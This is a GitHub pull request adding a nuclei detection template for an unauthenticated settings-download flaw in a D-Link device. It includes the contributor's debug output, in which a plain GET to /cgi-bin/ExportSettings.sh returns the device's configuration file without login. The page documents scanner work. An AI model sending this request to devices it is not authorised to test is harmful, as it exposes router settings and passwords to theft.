Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create d-link-auth-bypass.yaml #7645

Merged
merged 5 commits into from
Jul 10, 2023
Merged

Create d-link-auth-bypass.yaml #7645

merged 5 commits into from
Jul 10, 2023

Conversation

gy741
Copy link
Contributor

@gy741 gy741 commented Jul 8, 2023

Template / PR Information

Hello,

Added d-link-auth-bypass.yaml

Template Validation

I've validated this template locally?

  • YES
  • NO

I tested using firmware emulation. So the results may be unstable.
I think, Depending on setup, you may not see the "Password" value.
"Password" exists in the reference video.

$ nuclei -t ./test.yaml -u http://192.168.0.1/ --debug

GET /cgi-bin/ExportSettings.sh HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [d-link-auth-bypass] Dumped HTTP response http://192.168.0.1/cgi-bin/ExportSettings.sh

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache\n
Content-Disposition: attachment; filename="RT2880_Settings.dat"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
Pragma: no-cache\n


00000000  23 54 68 65 20 66 6f 6c  6c 6f 77 69 6e 67 20 6c  |#The following l|
00000010  69 6e 65 20 6d 75 73 74  20 6e 6f 74 20 62 65 20  |ine must not be |
00000020  72 65 6d 6f 76 65 64 2e  0a 44 65 66 61 75 6c 74  |removed..Default|
00000030  0a                                                |.|
[d-link-auth-bypass:status-2] [http] [critical] http://192.168.0.1/cgi-bin/ExportSettings.sh
[d-link-auth-bypass:regex-1] [http] [critical] http://192.168.0.1/cgi-bin/ExportSettings.sh

actions-user and others added 2 commits July 8, 2023 01:28
@actions-user
Auto Generated cves.json [Sat Jul 8 01:28:30 UTC 2023] :robot:
c71000c
@gy741
Create d-link-auth-bypass.yaml
a7e2137 
Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
@DhiyaneshGeek DhiyaneshGeek self-assigned this Jul 8, 2023
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jul 8, 2023
@ritikchaddha ritikchaddha merged commit 6989cfa into projectdiscovery:main Jul 10, 2023
2 checks passed
@ritikchaddha
Copy link
Contributor

ritikchaddha commented Jul 10, 2023
edited
Loading

Hello @gy741, thank you so much for sharing this template with the community and contributing to this project 🍻

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@ritikchaddha ritikchaddha ritikchaddha approved these changes

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@gy741 @ritikchaddha @DhiyaneshGeek @actions-user